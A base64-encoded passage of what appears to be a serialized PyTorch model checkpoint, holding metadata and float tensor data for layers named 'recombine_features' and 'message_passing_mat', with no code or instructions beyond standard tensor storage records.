8BvfynqDwF3aM+lSZIvYa1pr4otbm+uCvNPlyQTz5c2j6+4ZqPvp5ur70viGm9se3pPIsQQL7rlhi+VYIXvtNDIb3i72a7mHuDPh6UML4PGSI9OpEevWIJRj7vyzw8YJJZPkethb6K2FO+i+3hPggZpT2yUbk9rz2GPh6Pkj5nhbc9BJx5PdG83L4UlIQ9GktlvvVP+D0JIjq9WtoKv6QscDzGjcM8jcEaPkB9bb98w4G+RNYOvW6LGT1jfGC+hINRvoBGhj1xfIVxfVJxfksASxBLIIZxf0sgSwGGcYCJaAIpUnGBdHGCUnGDWCUAAABiYXNlLmxheWVycy4yLnJlY29tYmluZV9mZWF0dXJlcy5iaWFzcYRoBShoBkI7AQAAgAKKCmz8nEb5IGqoUBkugAJN6QMugAJ9cQAoWBAAAABwcm90b2NvbF92ZXJzaW9ucQFN6QNYDQAAAGxpdHRsZV9lbmRpYW5xAohYCgAAAHR5cGVfc2l6ZXNxA31xBChYBQAAAHNob3J0cQVLAlgDAAAAaW50cQZLBFgEAAAAbG9uZ3EHSwR1dS6AAihYBwAAAHN0b3JhZ2VxAGN0b3JjaApGbG9hdFN0b3JhZ2UKcQFYDgAAADk0NDA1MzI0OTY2Njg4cQJYAwAAAGNwdXEDSxBOdHEEUS6AAl1xAFgOAAAAOTQ0MDUzMjQ5NjY2ODhxAWEuEAAAAAAAAABQbLS9piEWvWEXt735vgC+MtAcvjFoaL7NuZa9L/HVvbbZy73mIRC+cWUtvslv+72Uowi+J7S5vUuogb7jBMe+cYWFcYZScYdLAEsQhXGISwGFcYmJaAIpUnGKdHGLUnGMWCEAAABiYXNlLmxheWVycy4zLm1lc3NhZ2VfcGFzc2luZ19tYXRxjWgFKGgGQjydAACAAooKbPycRvkgaqhQGS6AAk3pAy6AAn1xAChYEAAAAHByb3RvY29sX3ZlcnNpb25xAU3pA1gNAAAAbGl0dGxlX2VuZGlhbnECiFgKAAAAdHlwZV9zaXplc3EDfXEEKFgFAAAAc2hvcnRxBUsCWAMAAABpbnRxBksEWAQAAABsb25ncQdLBHV1LoACKFgHAAAAc3RvcmFnZXEAY3RvcmNoCkZsb2F0U3RvcmFnZQpxAVgOAAAAOTQ0MDUzMjQ0Nzg0MDBxAlgDAAAAY3B1cQNNECdOdHEEUS6AAl1xAFgOAAAAOTQ0MDUzMjQ0Nzg0MDBxAWEuECcAAAAAAAAAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV